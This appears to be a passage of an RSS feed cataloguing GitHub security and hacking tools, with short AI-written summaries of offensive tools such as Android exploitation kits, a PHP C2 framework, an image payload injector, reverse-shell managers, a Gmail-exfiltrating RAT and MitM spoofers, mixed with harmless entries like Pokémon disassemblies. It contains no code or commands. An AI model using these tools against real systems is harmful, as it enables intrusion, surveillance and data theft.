&lt;p&gt;Relevant up to date documentation can be found on the official Phishing Frenzy website located below&lt;/p&gt;</description></item><item><title>phoneinfoga</title><link>https://rainmana.github.io/hackyfeed/tools/sundowndev-phoneinfoga/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sundowndev-phoneinfoga/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PhoneInfoga is an advanced information-gathering framework specifically designed for scanning international phone numbers. Its primary use case involves collecting detailed information such as country, area, carrier, and line type, while employing various OSINT techniques to uncover more about the phone number in question. Notable features include a graphical user interface for scans, programmatic access through a REST API, and the ability to check for the existence of a number and its associated reputation across different platforms.&lt;/p&gt;</description></item><item><title>PhoneSploit</title><link>https://rainmana.github.io/hackyfeed/tools/prbhtkumr-phonesploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/prbhtkumr-phonesploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PhoneSploit is a Python3 tool designed for remote exploitation through ADB (Android Debug Bridge), enabling users to perform a variety of actions on victim devices. Its notable features include the ability to access the device shell, capture screenshots and screen recordings, uninstall applications, and obtain system information in real time, along with file management capabilities such as pulling folders and sending files. The framework serves primarily as a penetration testing tool for assessing the security of Android devices, but it contains mandatory ethical usage disclaimers.&lt;/p&gt;</description></item><item><title>PhoneSploit-Pro</title><link>https://rainmana.github.io/hackyfeed/tools/azeemidrisi-phonesploit-pro/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/azeemidrisi-phonesploit-pro/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PhoneSploit Pro is an advanced Python-based tool designed for penetration testing and exploiting Android devices remotely through the Android Debug Bridge (ADB) and Metasploit Framework integration. It automates the process of creating, installing, and launching payloads to gain a Meterpreter session in a single click, along with extensive ADB functionalities for managing connected devices, such as file transfers, device control, and data extraction. Notable features include remote screen recording, SMS management, and capabilities for controlling device operations, making it a comprehensive toolkit for security assessments on Android platforms.&lt;/p&gt;</description></item><item><title>PHP-Antimalware-Scanner</title><link>https://rainmana.github.io/hackyfeed/tools/marcocesarato-php-antimalware-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marcocesarato-php-antimalware-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PHP Antimalware Scanner is a PHP-based tool designed to scan projects for malicious code embedded within PHP files. Its primary use case is to detect potential malware through an interactive console interface or in a reporting mode that generates results in HTML or text. Notable features include customizable scanning options for file paths, action prompts upon detection of malware, and compatibility with various PHP configurations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;p&gt;&lt;img src="images/logo.png" alt="Version"&gt;&lt;/p&gt;
&lt;h1 align="center"&gt;PHP Antimalware Scanner&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/version-0.15.1-brightgreen?style=for-the-badge" alt="Version"&gt;
&lt;img src="https://img.shields.io/badge/php-%3E%3D%207.4-4F5D95?style=for-the-badge" alt="Requirements"&gt;
&lt;img src="https://img.shields.io/badge/code%20style-PSR-blue?style=for-the-badge" alt="Code Style"&gt;
&lt;img src="https://img.shields.io/github/license/marcocesarato/PHP-Antimalware-Scanner?style=for-the-badge" alt="License"&gt;
&lt;a href="https://github.com/marcocesarato/PHP-Antimalware-Scanner"&gt;&lt;img src="https://img.shields.io/badge/GitHub-Repo-6f42c1?style=for-the-badge" alt="GitHub"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>php-spx</title><link>https://rainmana.github.io/hackyfeed/tools/noisebynorthwest-php-spx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noisebynorthwest-php-spx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SPX (Simple Profiling eXtension) is a lightweight PHP profiling tool designed to enhance performance analysis without external dependencies, ensuring data privacy on user infrastructure. It offers seamless profiling activation, requiring minimal setup, and supports multiple metrics like execution time, memory usage, and object tracking. Its integrated web UI enables interactive visualizations, including timelines and Flamegraphs, to facilitate detailed performance insights and troubleshooting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="spx---a-simple-profiler-for-php"&gt;SPX - A simple profiler for PHP&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/NoiseByNorthwest/php-spx/actions/workflows/main.yml"&gt;&lt;img src="https://github.com/NoiseByNorthwest/php-spx/actions/workflows/main.yml/badge.svg" alt="Build Status"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/badge/php-5.4--8.5-blue.svg" alt="Supported PHP versions: 5.4 .. 8.x"&gt;
&lt;img src="https://img.shields.io/badge/platform-GNU/Linux%20%7C%20macOS%20%7C%20FreeBSD%20-yellow" alt="Supported platforms: GNU/Linux, macOS &amp;amp; FreeBSD"&gt;
&lt;img src="https://img.shields.io/badge/architecture-x86--64%20%7C%20ARM64%20-silver" alt="Supported architectures: x86-64 or ARM64"&gt;
&lt;a href="https://github.com/NoiseByNorthwest/php-spx/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/NoiseByNorthwest/php-spx" alt="License"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>phpsploit</title><link>https://rainmana.github.io/hackyfeed/tools/nil0x42-phpsploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nil0x42-phpsploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PhpSploit is a full-featured Command and Control (C2) framework that maintains a persistent presence on web servers using a polymorphic PHP one-liner. Its primary use case is for penetration testing and exploitation, enabling users to execute commands, manage files remotely, interact with a SQL console, and escalate privileges through over 20 available plugins. Notable features include obfuscated communication via HTTP headers and seamless file upload/download capabilities, facilitating robust interactions with target systems while bypassing standard PHP security measures.&lt;/p&gt;</description></item><item><title>Phunter</title><link>https://rainmana.github.io/hackyfeed/tools/n0rz3-phunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/n0rz3-phunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Phunter is a sophisticated tool designed for information retrieval related to phone numbers, enabling users to identify details such as the operator, potential locations, line type, and reputation. It features several capabilities including checks for spam activity, Amazon account linkage, and ownership verification, with functionality for both single-number queries and bulk processing from files. The tool is intended for educational purposes and offers a command-line interface with various output options.&lt;/p&gt;</description></item><item><title>pi-pwnbox-rogueap</title><link>https://rainmana.github.io/hackyfeed/tools/koutto-pi-pwnbox-rogueap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/koutto-pi-pwnbox-rogueap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pi-PwnBox is a headless Raspberry Pi-based Rogue Access Point (RogueAP) designed for conducting Red Team engagements and WiFi security assessments. It leverages Alfa WiFi USB adapters for a variety of WiFi attacks and includes features such as remote access, a comprehensive setup process, and associated WiFi hacking resources. This tool is particularly suited for on-site testing and learning environments focused on WiFi security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pi-pwnbox-rocket--rogueap-satellite"&gt;Pi-PwnBox :rocket: -RogueAP :satellite:&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Homemade (headless) PwnBox / RogueAP based on Raspberry Pi &amp;amp; Alfa WiFi USB Adapters.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>pikachu-volleyball</title><link>https://rainmana.github.io/hackyfeed/tools/gorisanson-pikachu-volleyball/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gorisanson-pikachu-volleyball/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pikachu Volleyball is a reimplementation of a classic 1997 Windows game, now developed in JavaScript for web play. Its primary use case is to provide a nostalgic gaming experience by enabling users to play volleyball with Pikachu characters while utilizing a physics engine and AI derived from reverse-engineered original machine code. Notable features include a customizable local server setup for gameplay and an extended AI vs. AI match time, allowing for continuous observation of the computer-controlled players.&lt;/p&gt;</description></item><item><title>PINCE</title><link>https://rainmana.github.io/hackyfeed/tools/korcankaraokcu-pince/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/korcankaraokcu-pince/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PINCE is a front-end tool for the GNU Project Debugger (GDB) tailored for reverse engineering, particularly in gaming contexts. Its noteworthy features include efficient memory and pointer scanning using specialized libraries, background execution for concurrent command execution, and extensive variable inspection and modification capabilities, resembling those of Cheat Engine. Additionally, PINCE supports dynamic address tables, smart casting of data types, and comprehensive disassembly functionalities, enabling users to analyze and manipulate memory with precision.&lt;/p&gt;</description></item><item><title>pixiewps</title><link>https://rainmana.github.io/hackyfeed/tools/wiire-a-pixiewps/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wiire-a-pixiewps/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pixiewps is a C-based tool that performs offline brute-force attacks on WPS PINs utilizing the &amp;ldquo;pixie-dust attack,&amp;rdquo; allowing it to potentially recover vulnerable pins in seconds to minutes, as opposed to hours. Notably, since version 1.4, it can also retrieve WPA-PSK from passive captures and includes support for multi-threading to enhance performance. Designed primarily for educational purposes, Pixiewps requires specific input parameters related to WPS authentication, and offers various operational modes for advanced usage.&lt;/p&gt;</description></item><item><title>pixload</title><link>https://rainmana.github.io/hackyfeed/tools/sighook-pixload/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sighook-pixload/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pixload is a set of tools designed for creating and injecting payloads into image files, supporting formats like BMP, GIF, JPG, PNG, and WebP. Its primary use case is for stealthy payload delivery, enabling users to embed malicious code within legitimate image files while maintaining their validity. Notable features include straightforward command-line usage for various image types and integration with Metasploit for payload generation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pixload--image-payload-creating-tools"&gt;pixload &amp;ndash; Image Payload Creating tools&lt;/h1&gt;
&lt;h2 id="description"&gt;DESCRIPTION&lt;/h2&gt;
&lt;p&gt;Set of tools for &lt;del&gt;hiding backdoors&lt;/del&gt; creating/injecting payload into images.&lt;/p&gt;</description></item><item><title>plasma</title><link>https://rainmana.github.io/hackyfeed/tools/plasma-disassembler-plasma/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/plasma-disassembler-plasma/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PLASMA is an interactive disassembler that converts binary code into more readable assembly language with syntax highlighting, supporting architectures such as x86_64, ARM, and MIPS, along with ELF and PE formats. Its notable features include a Python API for scripting capabilities, allowing users to perform tasks like pseudo-decompilation, flow graph manipulation, and code assembly. The tool is currently under development and offers additional functionality through optional libraries for enhanced features.&lt;/p&gt;</description></item><item><title>Platypus</title><link>https://rainmana.github.io/hackyfeed/tools/wangyihang-platypus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wangyihang-platypus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Platypus is a modern terminal-based tool for managing multiple reverse shell sessions and clients, implemented in Go. Its primary use case is to facilitate secure and efficient reverse shell connections across various protocols, featuring functionalities such as multiple service listening ports, a RESTful API for management, file download/upload capabilities, and an interactive shell interface that supports common control commands. Notable features include automatic server initiation, port forwarding, and a web UI for enhanced usability.&lt;/p&gt;</description></item><item><title>PoC</title><link>https://rainmana.github.io/hackyfeed/tools/thezdi-poc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thezdi-poc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Proofs-of-concept&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Proofs-of-concept&lt;/p&gt;</description></item><item><title>POC-T</title><link>https://rainmana.github.io/hackyfeed/tools/xyntax-poc-t/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xyntax-poc-t/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; POC-T (Pentest Over Concurrent Toolkit) is a versatile framework designed for penetration testing that facilitates concurrent tasks such as data collection, web crawling, brute-force attacks, and bulk PoC management. Its notable features include support for both multithreading and Gevent concurrency modes, simplified script writing without extensive documentation, built-in script extensions, and integration with popular search engine APIs like ZoomEye, Shodan, and Google.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="poc-t-pentest-over-concurrent-toolkit"&gt;POC-T: &lt;em&gt;Pentest Over Concurrent Toolkit&lt;/em&gt;&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/python-2.7-yellow.svg" alt="Python 2.7"&gt;&lt;/a&gt; &lt;a href="https://raw.githubusercontent.com/Xyntax/POC-T/master/doc/LICENSE.txt"&gt;&lt;img src="https://img.shields.io/badge/license-GPLv2-red.svg" alt="License"&gt;&lt;/a&gt; &lt;a href="https://www.codacy.com/app/xyntax/POC-T?utm_source=github.com&amp;amp;utm_medium=referral&amp;amp;utm_content=Xyntax/POC-T&amp;amp;utm_campaign=Badge_Grade"&gt;&lt;img src="https://api.codacy.com/project/badge/Grade/1413552d34bc4a4aa84539db1780eb56" alt="Codacy Badge"&gt;&lt;/a&gt; &lt;a href="https://github.com/Xyntax/POC-T/wiki/%E5%86%85%E7%BD%AE%E8%84%9A%E6%9C%AC%E5%BA%93"&gt;&lt;img src="https://img.shields.io/badge/PoC/Scripts-52-blue.svg" alt="PoC/Scripts"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>PocOrExp_in_Github</title><link>https://rainmana.github.io/hackyfeed/tools/ycdxsb-pocorexp_in_github/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ycdxsb-pocorexp_in_github/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PocOrExp in Github is a tool designed for aggregating proof of concepts (PoCs) and exploitation scripts (Exp) associated with Common Vulnerabilities and Exposures (CVE) directly from GitHub. Its primary use case is to assist cybersecurity professionals in quickly locating relevant PoCs by year and monitoring updates for existing vulnerabilities. Notable features include year-specific data retrieval, initialization options to avoid processing handled CVEs, and the ability to track changes to PoCs over time.&lt;/p&gt;</description></item><item><title>pocsuite3</title><link>https://rainmana.github.io/hackyfeed/tools/knownsec-pocsuite3/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/knownsec-pocsuite3/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pocsuite3 is an open-source framework designed for remote vulnerability testing and proof-of-concept (PoC) development, focused on empowering penetration testers and security researchers. Notable features include a versatile PoC engine supporting multiple execution modes, dynamic loading of PoC scripts and targets from various sources, as well as comprehensive integration with tools like Seebug, Shodan, and ZoomEye. The tool also offers robust capabilities such as plugin support, multi-target loading, and HTTP/SOCKS proxy configuration, making it a powerful asset in the security testing arsenal.&lt;/p&gt;</description></item><item><title>pokecrystal</title><link>https://rainmana.github.io/hackyfeed/tools/pret-pokecrystal/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pret-pokecrystal/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Pokémon Crystal repository consists of a comprehensive disassembly of the Pokémon Crystal game, designed to facilitate the building of various ROM versions. Primary use cases include reverse engineering, modding, and development of patches for the game, supported by resources such as documentation and tutorials. Notable features include the ability to produce different ROM versions and access to a community-driven platform for additional support and collaboration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pokémon-crystal-build-status"&gt;Pokémon Crystal &lt;a href="https://github.com/pret/pokecrystal/actions"&gt;&lt;img src="https://github.com/pret/pokecrystal/actions/workflows/main.yml/badge.svg" alt="Build Status"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;This is a disassembly of Pokémon Crystal.&lt;/p&gt;</description></item><item><title>pokeemerald</title><link>https://rainmana.github.io/hackyfeed/tools/pret-pokeemerald/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pret-pokeemerald/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pokémon Emerald is a decompilation project that allows users to build the ROM file for the Pokémon Emerald game. Its primary use case is for developers and enthusiasts looking to analyze, modify, or enhance the original game code. Notable features include the ability to reconstruct the game’s ROM and support for custom modifications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pokémon-emerald"&gt;Pokémon Emerald&lt;/h1&gt;
&lt;p&gt;This is a decompilation of Pokémon Emerald.&lt;/p&gt;
&lt;p&gt;It builds the following ROM:&lt;/p&gt;</description></item><item><title>pokefirered</title><link>https://rainmana.github.io/hackyfeed/tools/pret-pokefirered/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pret-pokefirered/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Pokémon FireRed and LeafGreen repository provides a comprehensive decompilation of the popular Pokémon games, enabling users to create various ROM images of FireRed and LeafGreen. Its primary use case is for game developers and modders looking to analyze, modify, or enhance the original games. Notable features include the generation of multiple ROM versions, including revisions and switch-compatible formats, along with detailed SHA1 checksums for verification.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pokémon-firered-and-leafgreen"&gt;Pokémon FireRed and LeafGreen&lt;/h1&gt;
&lt;p&gt;This is a decompilation of English Pokémon FireRed and LeafGreen.&lt;/p&gt;</description></item><item><title>pokered</title><link>https://rainmana.github.io/hackyfeed/tools/pret-pokered/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pret-pokered/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Pokémon Red and Blue repository provides a disassembly of the original Pokémon games, allowing users to rebuild the ROMs for both Pokémon Red and Blue, along with additional debug versions and patches. Its primary use case is for developers and enthusiasts looking to study, modify, or enhance the original game code, supported by extensive documentation and tutorials through its Wiki. Notable features include automated builds and a structured community for collaboration on Discord.&lt;/p&gt;</description></item><item><title>pokeruby</title><link>https://rainmana.github.io/hackyfeed/tools/pret-pokeruby/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pret-pokeruby/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pokémon Ruby and Sapphire is a comprehensive disassembly of the Game Boy Advance titles Pokémon Ruby and Sapphire, enabling developers to understand and modify the game&amp;rsquo;s code. The primary use case focuses on ROM development and enhancement, allowing users to compile the original game files, pokeruby.gba and pokesapphire.gba. Notable features include built-in support for building ROMs, making it an essential tool for enthusiasts involved in Pokémon game development and reverse engineering.&lt;/p&gt;</description></item><item><title>pokeyellow</title><link>https://rainmana.github.io/hackyfeed/tools/pret-pokeyellow/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pret-pokeyellow/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pokémon Yellow is a disassembly repository for the classic Game Boy Color game, allowing users to build various ROMs, including the standard Pokémon Yellow and a debug version named YELLMONS.GB. The tool provides comprehensive documentation, symbol information, and assembly tools to facilitate modifications and development for enthusiasts. Notable features include the ability to generate different ROM formats and a supportive community for collaborative development and troubleshooting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pokémon-yellow-build-status"&gt;Pokémon Yellow &lt;a href="https://github.com/pret/pokeyellow/actions"&gt;&lt;img src="https://github.com/pret/pokeyellow/actions/workflows/main.yml/badge.svg" alt="Build Status"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;This is a disassembly of Pokémon Yellow.&lt;/p&gt;</description></item><item><title>Pompem</title><link>https://rainmana.github.io/hackyfeed/tools/rfunix-pompem/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rfunix-pompem/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Find exploit tool&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Find exploit tool&lt;/p&gt;</description></item><item><title>power-pwn</title><link>https://rainmana.github.io/hackyfeed/tools/mbrg-power-pwn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mbrg-power-pwn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Power Pwn is a comprehensive offensive and defensive security toolset designed for the Microsoft 365 Power Platform and AI services. It includes multiple features such as tenant scanning with PowerDump, backdoor deployment, malware creation without coding, and tools for phishing and misconfiguration testing, providing users with extensive capabilities for security assessment and exploitation in Power Platform environments. Additionally, it offers utilities for enumerating custom GPTs and publicly exposed AI services, enhancing its utility for security professionals.&lt;/p&gt;</description></item><item><title>Powerful-Plugins</title><link>https://rainmana.github.io/hackyfeed/tools/hack-with-github-powerful-plugins/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hack-with-github-powerful-plugins/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Powerful Plugins is a curated collection of open-source plugins designed to enhance various frameworks and tools such as BurpSuite, Chrome, Firefox, IDA, Immunity, OllyDbg, and the Volatility Framework. Its primary use case is to extend the functionality of these platforms, enabling improved capabilities in tasks such as web application security testing and memory analysis. Notable features include the diverse range of supported tools and the invitation for community contributions to further expand the repository.&lt;/p&gt;</description></item><item><title>PowerHub</title><link>https://rainmana.github.io/hackyfeed/tools/adrianvollmer-powerhub/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/adrianvollmer-powerhub/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PowerHub is a post-exploitation tool designed for PowerShell, facilitating the transfer of potentially flagged data during penetration testing engagements. Its notable features include being fileless and stateless, utilizing cert pinning and RC4 encryption for string obfuscation, allowing seamless execution of C# programs in memory, and offering multiple methods to bypass AMSI. The tool simplifies processes such as running scripts and transferring sensitive information like Kerberos tickets or passwords, either through command line or a web interface, enhancing collaboration for testing teams.&lt;/p&gt;</description></item><item><title>PowerShell-for-Hackers</title><link>https://rainmana.github.io/hackyfeed/tools/i-am-jakoby-powershell-for-hackers/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/i-am-jakoby-powershell-for-hackers/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PowerShell for Hackers is a repository of customizable PowerShell functions designed to aid in developing payloads for security testing and ethical hacking. Key features include a variety of functions with descriptions, usage examples, and accompanying video tutorials, which facilitate the creation of payloads for diverse scenarios such as system manipulation, desktop interactions, and data concealment. This collection emphasizes community collaboration, allowing users to contribute their own functions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;&lt;h3&gt;2022 Hak5 hacker of the Year&lt;/h3&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src="https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/hak5-banner.png" alt="hak 5"&gt;&lt;/p&gt;</description></item><item><title>Powershell-RAT</title><link>https://rainmana.github.io/hackyfeed/tools/viralmaniar-powershell-rat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/viralmaniar-powershell-rat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Powershell-RAT is a Python-based remote access tool designed for red team engagements to backdoor Windows machines. Its primary use case involves tracking user activity through screen captures and exfiltrating data via email attachments using Gmail. Key features include stealthy operation, the ability to execute tasks such as taking screenshots and scheduling tasks, and a comprehensive &amp;ldquo;Hail Mary&amp;rdquo; option for automated execution.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="powershell-rat"&gt;Powershell-RAT&lt;/h1&gt;
&lt;p&gt;Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.&lt;/p&gt;</description></item><item><title>pretender</title><link>https://rainmana.github.io/hackyfeed/tools/redteampentesting-pretender/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/redteampentesting-pretender/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;pretender&lt;/code&gt; is a versatile tool designed for executing man-in-the-middle (MitM) attacks by spoofing local name resolutions and performing DHCPv6 DNS takeover. It specializes in relaying attacks primarily against Windows hosts, leveraging protocols such as mDNS, LLMNR, and NetBIOS-NS spoofing. Notable features include the ability to log network queries in dry run mode, tailored domain responses, and integration with relaying tools like Impacket&amp;rsquo;s &lt;code&gt;ntlmrelayx.py&lt;/code&gt; and &lt;code&gt;krbrelayx&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;h1 align="center"&gt;&lt;b&gt;pretender&lt;/b&gt;&lt;/h1&gt;
 &lt;p align="center"&gt;&lt;i&gt;Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover&lt;br&gt;as well as mDNS, LLMNR and NetBIOS-NS spoofing&lt;/i&gt;&lt;/p&gt;</description></item><item><title>privacy-respecting</title><link>https://rainmana.github.io/hackyfeed/tools/nikivdev-privacy-respecting/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nikivdev-privacy-respecting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Privacy Respecting&amp;rdquo; repository is a curated list of services and software alternatives that prioritize user privacy, aiming to offer users choices away from platforms that collect extensive personal data. It categorizes privacy-focused options across various domains such as search engines, social networks, and cloud storage, while providing insights on the implications of using mainstream services. Notable features include detailed explanations for suggested alternatives and a structured format for easy navigation through the listed services.&lt;/p&gt;</description></item><item><title>privacy.sexy</title><link>https://rainmana.github.io/hackyfeed/tools/undergroundwires-privacy.sexy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/undergroundwires-privacy.sexy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; privacy.sexy is a cross-platform tool designed to enforce privacy and security best practices on Windows, macOS, and Linux systems. Its notable features include integration with unit, integration, and end-to-end testing workflows, as well as security checks for dependencies using Static Analysis Security Testing (SAST), ensuring a robust and secure user experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
